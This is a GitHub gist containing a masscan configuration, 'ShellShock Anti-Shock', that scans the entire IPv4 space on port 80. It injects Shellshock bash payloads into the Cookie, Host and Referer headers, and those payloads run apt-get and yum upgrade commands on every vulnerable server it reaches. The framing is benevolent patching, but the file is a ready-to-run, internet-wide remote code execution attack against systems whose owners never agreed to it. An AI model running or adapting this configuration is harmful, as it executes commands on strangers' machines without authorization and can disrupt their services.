Skip to content

Instantly share code, notes, and snippets.

@breakersall
Last active August 29, 2015 14:06
Show Gist options
  • Save breakersall/9f5250f76295626d6e12 to your computer and use it in GitHub Desktop.
Save breakersall/9f5250f76295626d6e12 to your computer and use it in GitHub Desktop.
ShellShock Anti-Shock - masscan
#InfoSec good dead fairy
#Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = InfosecFairy
http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment